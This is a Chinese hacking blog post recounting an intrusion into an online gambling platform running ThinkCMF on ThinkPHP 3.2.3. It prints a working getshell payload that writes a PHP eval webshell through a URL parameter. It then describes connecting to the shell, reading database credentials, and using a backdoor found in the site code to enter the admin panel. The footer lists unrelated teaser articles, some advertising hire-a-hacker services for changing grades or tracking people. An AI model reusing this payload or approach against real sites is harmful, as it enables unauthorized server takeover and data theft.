渗透小计之「竟然有人在网赌平台代码里下毒」

访客3年前黑客文章672

print by 猩猩安全团队——作者:hurnme、flyingdemon

引言

记一次对某网D平台的渗透,以及发现其后台源码存在后门的过程

确定目标CMS

拿到其ip之后先信息搜集搜了了一波,确定目标使用的是ThinkCMF。

1608950324_5fe6a23450ebaf27b1806.png!small?1608950324080

进去之后在url处构造报错

1608949555_5fe69f33c999ae566e1cd.png!small?1608949555635

写入一句话

查看到ThinkPHP版本崴3.2.3,那么对应的thinkCMF版本应该存在前台getshell的洞。废话不多说,直接构造payload一发入魂。

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[" ***  *** 521"]);?>')</php>

写入shell之后连接蚁剑,直接拿下

1608949768_5fe6a008065c146cdc01d.png!small?1608949767848

鄙人在渗透的过程中一直有一个习惯,那就是无论如何都要拿到后台管理员权限,不拿后台权限就浑身不得劲,即使拿下了主机,也是吃嘛嘛不香。没拿到后台就拿下主机,那和没确定关系就 *** 有什么区别!

1608950091_5fe6a14bedb97de6b3050.png!small?1608950091964

进入♂后台

一开始的思路是读取其config.php文件连接他的数据库,在拿到了数据库账号和密码的时候怎么连也连不上去,小伙伴提供了另一条思路,修改后台登录逻辑,直捣黄龙。

正在我要修改后台登录逻辑的时,浏览代码的过程中无意之中发现了一个好玩的线索。

1608950289_5fe6a211ecb71294db37e.png!small?1608950289732

这。。。这TM。。。有人在代码里下毒。

拿着不知道是哪位好心人留下的后门,含泪登录了后台。

1608950667_5fe6a38b3a8f9a6467892.png!small?1608950667016

帮这个主机免费做了一次入侵检测,没有发现我们进入之前被入侵的痕迹,盲猜可能是这个平台自带后门。


相关文章

复方甘草片怎么样,复方甘草在服用时应注意以下7点

复方甘草片怎么样,复方甘草在服用时应注意以下7点

复方甘草片怎么样,复方甘草在服用时应注意以下7点。 复方甘草片是常用的止咳药,由甘草流浸膏、阿片粉、樟脑、八角茴香、苯甲酸钠所组成。 其中,甘草流浸膏为保护性镇咳祛痰剂;阿片粉有较强镇咳作用...

侵害未成年人重大犯显卡配置排名罪该判死刑的毫不手软

  10日举行的全国高级法院院长会议提出,要深入实施新修订的未成年人保护法、预防未成年人犯罪法,坚决依法严惩各类侵害未成年人违法犯罪,特别是针对未成年人的杀人、拐卖、强奸等挑战法律和社会伦理底线的重大...

打卡0元学/日售3万单/营收1000万,如何打造爆款教育分销产品?

打卡0元学/日售3万单/营收1000万,如何打造爆款教育分销产品?

编辑导语:在已经到来的暑假,K12在线教诲使出了混身解数推广产物,各大教诲企业推出“0元学”项目,抓住客户的心,但“0元学”存在必然的营收问题;本文作者具体阐明白三个“0元学产物”,看看作者给我们提的...

黑客接单网先接单_找黑客抓人

· 一名23岁的澳大利亚女子因偷盗 10万个XRP被捕。 该女子进犯了一名 56 岁的加密使用者的钱包,并将价值 46000 美元的Ripple转移到一家我国加密钱银买卖所。 一、简介灰盒测验是根据程...

会当凌绝顶,一览众山小。全诗翻译赏析及作者出处

會當凌絕頂,一覽眾山小。全詩翻譯賞析及作者出處讀書啊,我信赖但有朗朗書聲出破廬,遲早有一日有萬鯉躍龍門之奇象。 會當凌絕頂,一覽眾山小。這句話是什麼意思?出自哪首詩?作者是誰?下面高三網小編為同學...

毕业后找黑客修改大学成绩-黑客自学手册简体中文(黑客自学手册安卓中

黑客怎么进入对方qq空间模仿黑客的软件(模仿黑客入侵网站)黑客是怎么进行攻击的普通人能成为黑客吗(普通人怎么成为童星)怎么让别人觉得你是个黑客自学黑客技术看什么书(零基础自学黑客技术)黑客入侵手机该怎...